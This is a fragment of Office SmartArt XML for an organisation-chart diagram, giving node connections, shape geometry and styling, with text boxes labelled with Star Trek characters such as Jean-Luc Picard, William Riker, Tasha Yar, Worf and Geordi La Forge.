    <dgm:cxn modelId="{4CF74AE8-878D-4A4B-9034-419420B0C6D1}" srcId="{31D8764E-A603-4F69-B003-AC67D5294D53}" destId="{E8E5B010-BA79-4B44-A103-50873450C6D7}" srcOrd="1" destOrd="0" parTransId="{2CADA0E5-C828-4828-9A4C-7492D649C45A}" sibTransId="{80DD14CD-945A-40A7-9995-AC1A61E5486C}"/>
    <dgm:cxn modelId="{E07D8D47-B953-4B8C-BF1D-D69DC71E4E5A}" type="presOf" srcId="{4F6B56C9-38E0-40D3-BEB1-64669908C714}" destId="{6207C83D-D6EA-459D-888E-E778A01272C9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{3397E355-10E6-4FED-98BD-DBEBEF8C1B0F}" type="presOf" srcId="{E8E5B010-BA79-4B44-A103-50873450C6D7}" destId="{4DB341DB-4365-4FAA-B312-209D893A9DF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{CEA03380-9288-4964-98A5-2B21C53668E8}" srcId="{E8E5B010-BA79-4B44-A103-50873450C6D7}" destId="{AE4B0BA9-844D-43E0-A76E-8A5989F3BF66}" srcOrd="0" destOrd="0" parTransId="{C8469F5E-A58E-468D-B1CE-DA25DF7385BA}" sibTransId="{4059FCF3-4F2A-408E-95B7-30191E801949}"/>
    <dgm:cxn modelId="{0BA70886-7333-45B3-8F3C-1AE03328A7BB}" type="presOf" srcId="{31D8764E-A603-4F69-B003-AC67D5294D53}" destId="{1444E289-AD96-478D-B1C4-40E457B4BB93}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{E0776648-CDDD-4ED8-BB83-14025CFD09AE}" type="presOf" srcId="{EDC02C33-6543-4A09-BD5F-26D02354F389}" destId="{4D2F7974-0C00-4278-8D33-B7F519AA601F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{0B4E37E6-E36A-48EE-831F-46616EB34C79}" type="presOf" srcId="{C8469F5E-A58E-468D-B1CE-DA25DF7385BA}" destId="{3A24ACDB-6F06-450A-BD34-A76AEB23777C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{843D1B94-0478-464F-9675-F60A12E0CDEC}" type="presOf" srcId="{EDC02C33-6543-4A09-BD5F-26D02354F389}" destId="{FD2DB08C-AAE1-44D0-A589-AA2DA70E2D47}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{8E43709E-9AD0-478E-8C38-4474074214CF}" srcId="{31D8764E-A603-4F69-B003-AC67D5294D53}" destId="{4F6B56C9-38E0-40D3-BEB1-64669908C714}" srcOrd="2" destOrd="0" parTransId="{CE0F37E3-19E8-4DC4-8C59-F7151EC3A5CA}" sibTransId="{E87E6C93-F758-482A-BFA7-5A12CC035512}"/>
    <dgm:cxn modelId="{62B8C345-930A-4A78-B5F3-C37E80AA16C8}" type="presOf" srcId="{2CADA0E5-C828-4828-9A4C-7492D649C45A}" destId="{0EFF209C-7444-451A-80F9-3628B6EAED0C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{41AB5B69-FB5A-4A06-9FA5-2FD3DE19CC48}" type="presOf" srcId="{E8E5B010-BA79-4B44-A103-50873450C6D7}" destId="{ACED220E-3CAF-4E9A-BF89-BC7FED98E3C0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{ADBCFE86-9851-494F-AB73-595D80321D4B}" srcId="{31D8764E-A603-4F69-B003-AC67D5294D53}" destId="{D13991F7-ACB7-4572-A7ED-D2B99CA090B5}" srcOrd="0" destOrd="0" parTransId="{D0380AC1-D2FF-4B32-BE15-33D16692CA28}" sibTransId="{350A3AE8-FC97-4317-83DE-4AA8C13F2CCF}"/>
    <dgm:cxn modelId="{8AB65041-F67D-494E-B7B8-C497D6E094BB}" type="presParOf" srcId="{AFBB86FE-D98D-460B-9B70-50AF4AAB0E52}" destId="{9F0C2022-4D45-4A38-A64A-6074FC355002}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{3F8F8AA0-19D8-48C8-87E8-BFFF9EF6AF32}" type="presParOf" srcId="{9F0C2022-4D45-4A38-A64A-6074FC355002}" destId="{FCCDB03B-34BB-4ED4-B41B-E4329FD71F07}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{61B3F523-981E-4226-8EAC-90F97D6C7FED}" type="presParOf" srcId="{FCCDB03B-34BB-4ED4-B41B-E4329FD71F07}" destId="{B74C1D86-85DF-430A-944E-6260C233392C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{07D81D90-A0E6-4792-9EBD-B779810F150A}" type="presParOf" srcId="{FCCDB03B-34BB-4ED4-B41B-E4329FD71F07}" destId="{1444E289-AD96-478D-B1C4-40E457B4BB93}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{976AAFA8-53DB-4531-89D3-A8043643EA7D}" type="presParOf" srcId="{9F0C2022-4D45-4A38-A64A-6074FC355002}" destId="{7268D3E9-6165-484E-843D-BDFAE245245D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{D36D4068-88CB-48E9-BA2D-4EFCFDBF6C6C}" type="presParOf" srcId="{7268D3E9-6165-484E-843D-BDFAE245245D}" destId="{A010614D-EB35-40F2-8578-6EFCB01A8B5C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{F664CCA8-1019-42A9-A4C4-A372727145FC}" type="presParOf" srcId="{7268D3E9-6165-484E-843D-BDFAE245245D}" destId="{076B4B26-8B61-4646-ADC3-5176C660F27D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{62FB3CA0-4BB4-4F27-9344-DBD60C213D77}" type="presParOf" srcId="{076B4B26-8B61-4646-ADC3-5176C660F27D}" destId="{C51CD4E5-10E3-4C6F-90BD-5FF2676E4696}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{757D36D5-E9E8-4FE7-9743-15EDFA376F1A}" type="presParOf" srcId="{C51CD4E5-10E3-4C6F-90BD-5FF2676E4696}" destId="{8B6ED99F-5810-4483-AE98-FB1D53AFFC39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{2C32A3F4-AA98-49DC-BEF4-8A661CC05DC9}" type="presParOf" srcId="{C51CD4E5-10E3-4C6F-90BD-5FF2676E4696}" destId="{33A440DB-D103-4601-BB0E-08F1B2DB73F0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{C18847E9-B663-427B-981A-BE1307F7C2A9}" type="presParOf" srcId="{076B4B26-8B61-4646-ADC3-5176C660F27D}" destId="{4198BB45-3C30-4181-ADD1-BC5B60758D35}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{D0F4D451-15A9-41D0-9D63-8763AEF83089}" type="presParOf" srcId="{076B4B26-8B61-4646-ADC3-5176C660F27D}" destId="{953119A2-BFFE-43DD-B959-7DA16E58A76B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{A5942985-4645-4EB3-B64C-5F3FA9418E12}" type="presParOf" srcId="{7268D3E9-6165-484E-843D-BDFAE245245D}" destId="{0EFF209C-7444-451A-80F9-3628B6EAED0C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{DC7A2971-589E-495A-970E-CFA6B80167AA}" type="presParOf" srcId="{7268D3E9-6165-484E-843D-BDFAE245245D}" destId="{5E6ADCB9-1AF3-454C-8992-3676C5E7A885}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{DF83A4AF-298C-48A1-8841-372B392A264E}" type="presParOf" srcId="{5E6ADCB9-1AF3-454C-8992-3676C5E7A885}" destId="{84A32323-10D2-4F4B-A027-6A519EAC6C9B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{55B14F5E-0BC5-497E-AC7E-49FB00A6C89A}" type="presParOf" srcId="{84A32323-10D2-4F4B-A027-6A519EAC6C9B}" destId="{4DB341DB-4365-4FAA-B312-209D893A9DF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{70C57B9F-4FC9-48B2-8C93-C7928BEE0012}" type="presParOf" srcId="{84A32323-10D2-4F4B-A027-6A519EAC6C9B}" destId="{ACED220E-3CAF-4E9A-BF89-BC7FED98E3C0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{2213634F-D3BE-4BA9-AE35-43B1B6A8C82D}" type="presParOf" srcId="{5E6ADCB9-1AF3-454C-8992-3676C5E7A885}" destId="{06781E97-D47A-4BC7-8EFE-36E83B724632}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{50A3FB9B-D181-4A7C-A576-965C2E76D8B0}" type="presParOf" srcId="{06781E97-D47A-4BC7-8EFE-36E83B724632}" destId="{3A24ACDB-6F06-450A-BD34-A76AEB23777C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{885F10A9-3D08-4A01-88DE-3C843B4B2448}" type="presParOf" srcId="{06781E97-D47A-4BC7-8EFE-36E83B724632}" destId="{9E7112DC-A276-46F5-AE52-8B29063639BE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{4C73A223-703E-43B0-A58D-1851452CDF1D}" type="presParOf" srcId="{9E7112DC-A276-46F5-AE52-8B29063639BE}" destId="{BB7BC346-7441-445C-A561-990E85AF64AA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{F830D742-6DB8-47E9-AFAD-3B72DB902329}" type="presParOf" srcId="{BB7BC346-7441-445C-A561-990E85AF64AA}" destId="{806A5669-F4AF-4E83-88FD-387AED7B173C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{2141EE0E-55D3-4795-812A-CC43D1A61FD9}" type="presParOf" srcId="{BB7BC346-7441-445C-A561-990E85AF64AA}" destId="{CE26303C-F7B7-41DF-9A5F-C8B67B7464F6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{BA1A363C-1485-401E-80FD-821413372694}" type="presParOf" srcId="{9E7112DC-A276-46F5-AE52-8B29063639BE}" destId="{2812526F-09B5-477B-B302-FDB6A48ABC82}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{B3A94C35-A8FA-4B6F-AF43-B17561FEEE39}" type="presParOf" srcId="{9E7112DC-A276-46F5-AE52-8B29063639BE}" destId="{C2A85679-25CE-479C-8971-E9DB0A2DC308}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{4D68C46F-8075-4BCD-B05E-122B7BE77236}" type="presParOf" srcId="{5E6ADCB9-1AF3-454C-8992-3676C5E7A885}" destId="{56823D41-3FC2-43A8-BE87-5C0093EA6D68}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{392C8376-9C8E-475A-BEB4-6043AE02E62A}" type="presParOf" srcId="{7268D3E9-6165-484E-843D-BDFAE245245D}" destId="{7450C841-7DEF-4F0C-A27F-AB66E31A3498}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{0ECC6E7F-F5F7-4662-8B7C-9E43DA967D18}" type="presParOf" srcId="{7268D3E9-6165-484E-843D-BDFAE245245D}" destId="{8EF2ADB3-2391-4762-B01D-231C1EDEC2BE}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{1E65D742-77B9-428D-A1A7-F9DC478C0446}" type="presParOf" srcId="{8EF2ADB3-2391-4762-B01D-231C1EDEC2BE}" destId="{3BADEBC8-944F-4369-8757-06D96D4B65F3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{B3FB43A1-5A1C-46F3-9303-381DA3BCEFD2}" type="presParOf" srcId="{3BADEBC8-944F-4369-8757-06D96D4B65F3}" destId="{6207C83D-D6EA-459D-888E-E778A01272C9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{931F5272-8E32-4FC7-BEF6-5D98665A5BAC}" type="presParOf" srcId="{3BADEBC8-944F-4369-8757-06D96D4B65F3}" destId="{AFDCE2A7-FA2F-4AFC-B51E-C6C7F4B261CF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{84B3F3C2-EE72-427F-B55B-9C9D5651355B}" type="presParOf" srcId="{8EF2ADB3-2391-4762-B01D-231C1EDEC2BE}" destId="{6047A76B-A7CB-44EE-AA60-58F534E2A7B9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{1C93F2DF-B55B-4729-9112-C74A7EAB6BA0}" type="presParOf" srcId="{6047A76B-A7CB-44EE-AA60-58F534E2A7B9}" destId="{B9353271-2BAE-446C-B21C-CE444FB8BF4F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{E2DA4547-95A9-453C-AF99-ECC826F93730}" type="presParOf" srcId="{6047A76B-A7CB-44EE-AA60-58F534E2A7B9}" destId="{BB7B3BF8-EB0C-45DF-AEC5-DC8E351F6662}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{66980E1B-6C0E-4137-A33F-54FA5C95226B}" type="presParOf" srcId="{BB7B3BF8-EB0C-45DF-AEC5-DC8E351F6662}" destId="{9AF7B2C7-48EA-4847-89C2-A18685C88E20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{DE05F50E-BD16-4345-9B3F-A0CBADA77F9C}" type="presParOf" srcId="{9AF7B2C7-48EA-4847-89C2-A18685C88E20}" destId="{4D2F7974-0C00-4278-8D33-B7F519AA601F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{58DD04EA-8C00-4065-BCD0-CC0CF6390793}" type="presParOf" srcId="{9AF7B2C7-48EA-4847-89C2-A18685C88E20}" destId="{FD2DB08C-AAE1-44D0-A589-AA2DA70E2D47}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{3E24F969-830A-4AC5-9D05-132E6CC4A475}" type="presParOf" srcId="{BB7B3BF8-EB0C-45DF-AEC5-DC8E351F6662}" destId="{C4E9BF98-E255-4FCD-A66E-3B307F25F1F1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{E3860182-E630-454B-8A69-CE3F5D53A152}" type="presParOf" srcId="{BB7B3BF8-EB0C-45DF-AEC5-DC8E351F6662}" destId="{D7F6D1E1-4814-4A93-B297-E8C9DFD80B68}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{C2C2B451-48A9-4926-BC87-A5E91513AB4F}" type="presParOf" srcId="{8EF2ADB3-2391-4762-B01D-231C1EDEC2BE}" destId="{50A0B54C-12DE-4BF7-A83E-CDA6E643D7D8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{28607432-BD9E-4F1A-93DA-DA9BC22766B6}" type="presParOf" srcId="{9F0C2022-4D45-4A38-A64A-6074FC355002}" destId="{E8026B54-D7FF-490F-BF7F-81B85A06C9CC}"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353271-2BAE-446C-B21C-CE444FB8BF4F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2876989" y="1618715"/>
          <a:ext cx="171129" cy="524795"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="524795"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="171129" y="524795"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:shade val="8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7450C841-7DEF-4F0C-A27F-AB66E31A3498}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1952892" y="808704"/>
          <a:ext cx="1380441" cy="239580"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="119790"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1380441" y="119790"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1380441" y="239580"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">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3A24ACDB-6F06-450A-BD34-A76AEB23777C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1496548" y="1618715"/>
          <a:ext cx="171129" cy="524795"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="524795"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="171129" y="524795"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:shade val="8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0EFF209C-7444-451A-80F9-3628B6EAED0C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1907172" y="808704"/>
          <a:ext cx="91440" cy="239580"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="239580"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">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A010614D-EB35-40F2-8578-6EFCB01A8B5C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="572451" y="808704"/>
          <a:ext cx="1380441" cy="239580"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1380441" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1380441" y="119790"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="119790"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="239580"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">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B74C1D86-85DF-430A-944E-6260C233392C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1382462" y="238273"/>
          <a:ext cx="1140860" cy="570430"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="lt1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="100000"/>
                <a:shade val="100000"/>
                <a:satMod val="130000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="l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US" sz="1900" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Jean-Luc Picard</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1382462" y="238273"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8B6ED99F-5810-4483-AE98-FB1D53AFFC39}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2020" y="1048284"/>
          <a:ext cx="1140860" cy="570430"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="lt1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="100000"/>
                <a:shade val="100000"/>
                <a:satMod val="130000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="l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US" sz="1900" kern="1200" dirty="0" smtClean="0"/>
            <a:t>William Riker</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2020" y="1048284"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4DB341DB-4365-4FAA-B312-209D893A9DF2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1382462" y="1048284"/>
          <a:ext cx="1140860" cy="570430"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="lt1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="100000"/>
                <a:shade val="100000"/>
                <a:satMod val="130000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="l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US" sz="1900" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Tasha </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Yar</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1382462" y="1048284"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{806A5669-F4AF-4E83-88FD-387AED7B173C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1667677" y="1858295"/>
          <a:ext cx="1140860" cy="570430"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="lt1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="100000"/>
                <a:shade val="100000"/>
                <a:satMod val="130000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="l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US" sz="1900" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Worf</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1667677" y="1858295"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6207C83D-D6EA-459D-888E-E778A01272C9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2762903" y="1048284"/>
          <a:ext cx="1140860" cy="570430"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="lt1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="100000"/>
                <a:shade val="100000"/>
                <a:satMod val="130000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="l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US" sz="1900" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Geordi</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0" smtClean="0"/>
            <a:t> La Forge</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2762903" y="1048284"/>
        <a:ext cx="1140860" cy="570430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4D2F7974-0C00-4278-8D33-B7F519AA601F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3048118" y="1858295"/>
          <a:ext cx="1140860" cy="570430"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="lt1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="100000"/>
                <a:shade val="100000"/>
                <a:satMod val="130000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="l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US" sz="1900" kern="1200" dirty="0" smtClean="0"/>
